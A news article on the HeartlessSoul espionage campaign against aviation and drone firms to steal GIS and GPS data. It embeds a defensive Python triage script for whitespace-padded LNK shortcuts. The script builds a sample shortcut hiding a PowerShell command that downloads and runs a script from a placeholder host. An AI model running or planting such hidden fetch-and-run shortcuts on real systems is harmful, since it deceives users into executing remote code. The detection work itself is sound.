Cyber Espionage Group Targets Aviation Firms to Steal Map Data
Recorded: May 11, 2026, 1:16 p.m.
| Original | Summarized |
The campaign quietly compromises aerospace and drone operators to exfiltrate GIS files, terrain models, and GPS data and gain a clear picture of adversaries' world view.

Robert Lemos, Contributing Writer
May 11, 2026
4 Min Read
Source: DC Studio via Shutterstock

As cyber operations continue to support regional conflicts, threat groups are targeting a wider range of information, including geospatial mapping and global positioning system (GPS) data that can be used to locate enemy assets and gather information on a rival's own intelligence capabilities, cybersecurity firms warn.

One cyber espionage group has used specially crafted phishing and malvertising campaigns to target aerospace firms and drone operators, creating domains and sites that host malware posing as installers for legitimate aviation software and resources, according to Kaspersky Lab. The group, dubbed HeartlessSoul, even planted a fake project on SourceForge, a legitimate download service, that served a malicious archive.

The ultimate goal of the group appears to be collecting geospatial data and information from compromised systems, which currently belong mainly to the Russian government and Russian enterprises, Kaspersky Lab tells Dark Reading.

"[T]his actor is a sophisticated one: combined multi-stage infection, fileless execution and the data the group targets, confirms that it is not just a hacktivist or criminal group, but a motivated group posing a serious threat to organizations," the cybersecurity firm said in its response.

With several ongoing regional military conflicts and an increase in interference with global navigation satellite systems (GNSS), geospatial data has become a more common, if not popular, target for some threat groups. In 2024, for example, the cybercriminal hacker IntelBroker claimed to have breached Space-Eyes, a Miami-based geospatial intelligence firm, although analysts have cast doubt on some of the hacker's claimed exploits. IntelBroker, later identified as British national Kai West, was arrested in June 2025.

The espionage campaigns show signs of sophistication and align with the concerns of nation-states, says Will Baxter, head of product for threat intelligence firm Team Cymru.

"The targeting of GIS, drone, and aviation data points to an intelligence-collection or defense-oriented angle, with downstream value across logistics disruption, infrastructure mapping, asset movement tracking, and operational planning," he says. "The most under-appreciated value in GIS theft is operational ground truth — the adversary gets to see exactly what the victim's own analysts believe about terrain, infrastructure, and routes, which lets them model gaps in the victim's own awareness."

Hackers Steal Geospatial Files, Hidden Commands

Once the attackers gain access to databases and workstations used for GIS analysis, HeartlessSoul downloads a variety of common document types, but also some rather uncommon types, including GPS data, Geographic Information System (GIS) shapefiles, digital geographic relief files, and some proprietary GIS mapping files, Kaspersky Lab stated in its report (in Russian).

"Such GIS files ... allow you to obtain information about infrastructure — roads, engineering networks, terrain, as well as strategic objects, and provide confidential data in engineering, state and industrial organizations," the company stated (Google translated) in the analysis.

The attackers used a variety of common techniques to compromise systems, including a JavaScript remote access Trojan (RAT) and PowerShell scripts for executing routine tasks. Some of the malicious LNK files abused a Windows shortcut flaw (ZDI-CAN-25373) that has become popular in advanced persistent threat (APT) campaigns: the shortcut's real command-line arguments are padded with a long run of whitespace, so the Windows properties dialog shows only an innocuous-looking target while the hidden arguments still execute when the shortcut is opened.

Kaspersky Lab has monitored the group through compromised command-and-control infrastructure since at least February.
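As an added example (not code from the article, from Kaspersky Lab, or from any vendor named above), the following Python script parses the StringData section of a Windows Shell Link (.lnk) file and flags the whitespace-padded COMMAND_LINE_ARGUMENTS layout that the ZDI-CAN-25373 technique relies on, so a responder can triage shortcuts dropped by a phishing archive without double-clicking them. The two shortcuts it builds in memory are constructed samples; the 32-character padding threshold, the `example.invalid` host in the hidden command line and the cp1252 fallback for non-Unicode shortcuts are assumptions.

```python
"""Triage .lnk files for whitespace-padded command-line arguments.

Parses the Shell Link binary format (MS-SHLLINK) far enough to reach the
StringData fields, then flags shortcuts whose COMMAND_LINE_ARGUMENTS start
with a long run of whitespace, which pushes the real command line out of the
visible part of the Windows properties dialog.  Parser, samples and threshold
are constructed for this example; they are not artefacts from the campaign.
"""
import struct

# MS-SHLLINK LinkFlags bits used below
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# LinkCLSID 00021401-0000-0000-C000-000000000046 in its on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
WHITESPACE = " \t\n\r\x0b\x0c"
PADDING_THRESHOLD = 32  # assumption: real tooling never emits this much leading whitespace

# StringData fields appear in this fixed order, each gated by its flag
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags plus the StringData fields present in a .lnk blob."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a Shell Link header")
    if data[4:20] != LNK_CLSID:
        raise ValueError("bad Shell Link CLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76  # fixed ShellLinkHeader size
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (u16) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"flags": flags}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + count * 2].decode("utf-16-le")
            pos += count * 2
        else:
            fields[name] = data[pos:pos + count].decode("cp1252")  # assumed ANSI codepage
            pos += count
    return fields


def padding_length(args: str) -> int:
    """Number of leading whitespace characters in the argument string."""
    return len(args) - len(args.lstrip(WHITESPACE))


def triage_lnk(data: bytes) -> dict:
    """Flag a shortcut whose arguments are hidden behind whitespace padding."""
    fields = parse_lnk(data)
    args = fields.get("arguments", "")
    pad = padding_length(args)
    hidden = args.strip(WHITESPACE)
    suspicious = pad >= PADDING_THRESHOLD and hidden != ""
    return {
        "relative_path": fields.get("relative_path", ""),
        "padding_chars": pad,
        "hidden_args": hidden if suspicious else "",
        "suspicious": suspicious,
    }


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal Unicode .lnk (header + RELATIVE_PATH + arguments)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # ShowCommand=SW_SHOWNORMAL

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed samples: an ordinary shortcut and a padded one (host is a placeholder).
BENIGN_LNK = build_lnk("..\\..\\Windows\\System32\\cmd.exe", "/c echo hello")
PADDED_LNK = build_lnk(
    "..\\..\\Windows\\System32\\cmd.exe",
    " " * 900 + "\n" * 20
    + '/c powershell -nop -w hidden -c "iwr http://example.invalid/setup.ps1 | iex"',
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("padded", PADDED_LNK)):
        print(label, triage_lnk(blob))
```

Run it over a directory of extracted shortcuts by reading each file's bytes into `triage_lnk`; a hit on `suspicious` with a `hidden_args` string that launches `powershell`, `cmd`, `mshta` or `wscript` is what to escalate, while a long padding count with no trailing payload is noise.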
The company traced the group's earliest activities back to at least September 2025.

Attribution in Aviation Attacks Remains Uncertain

While no Western cybersecurity vendors have identified a group that matches HeartlessSoul, two other Russian cybersecurity firms, Positive Technologies and BI.ZONE, have documented the threat group, with the latter naming it Versatile Werewolf. Two other threat groups, Paper Werewolf and Eagle Werewolf, also target drone-focused forums and chat channels, such as Telegram, as well as Russian citizens seeking to bypass restrictions on Starlink devices, according to a BI.ZONE analysis.

None of the three companies has publicly attributed the attacks. Paper Werewolf, also known as GOFFEE, appears to be linked to pro-Ukrainian groups, which initially targeted Russian defense contractors. BI.ZONE noted that the three groups, while given similar names and using similar techniques, appear to be operating autonomously.

Defenders should focus on mounting a practical response, hunting for signs of the attackers, and finding operational-security failures, Baxter says.

Additionally, companies and agencies that use GIS data should protect their crown jewels, putting specific assets such as flight-planning software behind zero-trust controls like identity-bound access with egress monitoring, and segmenting engineering networks from general business networks, he says.

The business benefits from reducing operational risk for its most critical systems without forcing non-critical environments to bear the burden of zero trust for no significant benefit. "It's an asymmetric investment in the small set of workstations that touch crown-jewel data," Baxter says. "Most businesses need flexibility and scale, and a textbook zero-trust posture on every drone-operator or field workstation isn't realistic."
This report details a cyber espionage campaign against aviation firms and drone operators by a group Kaspersky Lab tracks as HeartlessSoul. According to Kaspersky, the campaign uses phishing and malvertising, including lookalike domains and a fake SourceForge project, to deliver malware disguised as installers for legitimate aviation software. The group's objective appears to be the acquisition of geospatial data, including GIS shapefiles, terrain models and GPS data, which is particularly valuable amid ongoing regional conflicts and GNSS interference. HeartlessSoul combines multi-stage infection, fileless execution, a JavaScript RAT, PowerShell scripts and LNK files abusing the ZDI-CAN-25373 shortcut flaw, a profile Kaspersky says goes beyond typical hacktivist or criminal activity. The victims are currently mainly Russian government and enterprise systems; no vendor has publicly attributed the attacks, and no Western vendor has matched the group, although Positive Technologies and BI.ZONE have both documented it, the latter under the name Versatile Werewolf. Will Baxter of Team Cymru stresses that stolen GIS data yields operational ground truth, showing an adversary exactly what the victim's own analysts believe about terrain, infrastructure and routes. Defenders are urged to hunt for the attackers' activity and operational-security failures, and to place the small set of crown-jewel assets such as flight-planning software behind identity-bound access with egress monitoring and to segment engineering networks from general business networks, rather than imposing a full zero-trust posture on every field workstation.
The sophistication of the HeartlessSoul group highlights the convergence of cyber espionage and geopolitical tensions, and the need for a layered defense around sensitive geospatial assets.